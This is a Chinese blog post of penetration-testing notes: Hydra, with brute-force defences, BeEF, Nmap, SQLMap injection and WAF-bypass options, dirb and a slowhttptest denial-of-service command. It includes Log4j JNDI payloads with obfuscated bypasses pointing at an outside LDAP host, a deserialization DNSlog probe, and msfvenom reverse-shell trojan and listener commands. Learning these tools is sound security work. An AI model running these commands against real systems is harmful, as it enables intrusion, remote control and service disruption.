渗透测试工具使用总结
1.hydra[海德拉]:
密码能否被破解,关键取决于字典是否强大,
使用:
hydra -L user -P passlist.txt ftp://192.168.0.1
暴力破解的防御
useradd shell #对于不需要登录的用户,在新建用户的时候可以加入" -s /sbin/nologin"
密码的复杂性 #字母大小写+数字+特殊字符+20位以上+1个月更换一次
修改默认的端口 #修改"vim /etc/ssh/sshd_config"文件
组织登录的用户或组 #不允许用户登录,"PermitRootLogin yes" 添加特定的登录用户 ,"AllowUsers xxx"
使用sudo #
设置允许访问的IP #"/etc/hosts.allow" 只允许从堡垒机访问
使用DenyHosts自动统计,并将其加入到"/etc/hosts.deny"
禁用密码改用公钥认证登录
保护XSHELL导出会话文件
2.XSS漏洞复现工具(BeFF):
BeFF在Kali中已经自动集成,在运行BeFF之前要先开启Kali apache服务,"service apache start",所有要访问的页面在"/var/www/html"目录下面,也可以新建测试html页面。
在使用"systemctl start beef-xss.service "来开启BeFF服务,在Kali机的桌面也要启动BeFF的监听服务,默认端口为3000端口,
3.NMAP:
nmap -sn [IP] #主机发现
nmap -sS [端口] [IP] #端口扫描(TCP端口扫描)
nmap -O [IP] #系统扫描
namp -sV [IP] #版本扫描
nmap -Pn[IP] #跳过主机发现
nmap -sU[IP] #用户udp扫描
4.SQLMAP:
一般的数据库注入步骤:
1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点
2. --dbs 【检测站点包含哪些数据库
3. --current-db 【获取当前的数据库名
4. --tables -D "db_name" 【获取指定数据库中的表名 -D后接指定的数据库名称
5. --columns -T "table_name" -D "db_name" 【获取数据库表中的字段
6. --dump -C "columns_name" -T "table_name" -D "db_name" 【获取字段的数据内容
Cookie注入:
sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2 【cookie注入 后接cookie值
POST注入:
(1)目标地址http:// www.xxx.com /login.asp
(2)打开brup代理。
(3)点击表单提交
(4)burp获取拦截信息(post)
(5)右键保存文件(.txt)到指定目录下
(6)运行sqlmap并执行如下命令:
用例:sqlmap -r okay.txt -p username
-r表示加载文件(及步骤(5)保存的路径),-p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数)
(7)自动获取表单:--forms自动获取表单
例如:sqlmap -u www.xx.com/login.asp --forms
(8)指定参数搜索:--data
例如:sqlmap -u www.xx.com/login.asp --data "username=1"
SQLMAP常用的命令:
1. --purge 【重新扫描(--purge 删除原先对该目标扫描的记录) 2. --tables 【获取表名 3. --dbs 【检测站点包含哪些数据库 4. --current-db 【获取当前的数据库名 5. --current-user 【检测当前用户 6. --is-dba 【判断站点的当前用户是否为数据库管理员 7. --batch 【默认确认,不询问你是否输入 8. --search 【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D) 9. --threads 10 【线程,sqlmap线程最高设置为10 10. --level 3 【sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头 的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5 11. --risk 3 【执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全 12. -v 【详细的等级(0-6) 0:只显示Python的回溯,错误和关键消息。 1:显示信息和警告消息。 2:显示调试消息。 3:有效载荷注入。 4:显示HTTP请求。 5:显示HTTP响应头。 6:显示HTTP响应页面的内容 13. --privileges 【查看权限 14. --tamper xx.py,cc.py 【防火墙绕过,后接tamper库中的py文件 15. --method "POST" --data "page=1&id=2" 【POST方式提交数据 16. --threads number 【采用多线程 后接线程数 17. --referer "" 【使用referer欺骗 18. --user-agent "" 【自定义user-agent 19. --proxy “目标地址″ 【使用代理注入
Kali系统集成的SQLMAP工具目录:
sqlmap常用路径:
1. 添加表字段的目录在sqlmap/txt/common-tables.txt
2. 存放扫描记录的目录在sqlmap/output
5.Log4j检测及绕过:
检测:
${jndi:ldap://4jvfqe.ceye.io/exp}
绕过:
原本POC:
${jndi:ldap://malicious-ldap-server.com/a}
绕过的POC:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}
可行的POC:
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}
6.接口反序列化测试:
{"@type":"java.net.InetSocketAddress"{
"address":,
"val":"cyl31t.dnslog.cn"}}
7.Kali自集成的web目录扫描工具:
dirb
使用方法:
dirb [URL]
它的字典放在:
/usr/share/dirb/wordlist/common.txt
如果指定文件类型扫描,则使用如下命令:
dirb [URL] -X .txt,.php,.zip
8.slowhttptest使用语句
slowhttptest -c 8000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://www.xxx.com -p 3
9.MSF生成远控木马命令
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[攻击机IP] lport=[攻击机监听端口] -f exe -o demo.exe
下一步开启msf的监听,等待木马上线
use exploit/mutil/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost [攻击机IP]
set lport [攻击机端口]
run
本文来自博客园,作者:田家少闲月-,转载请注明原文链接:https://www.cnblogs.com/zhaoyunxiang/p/16060389.html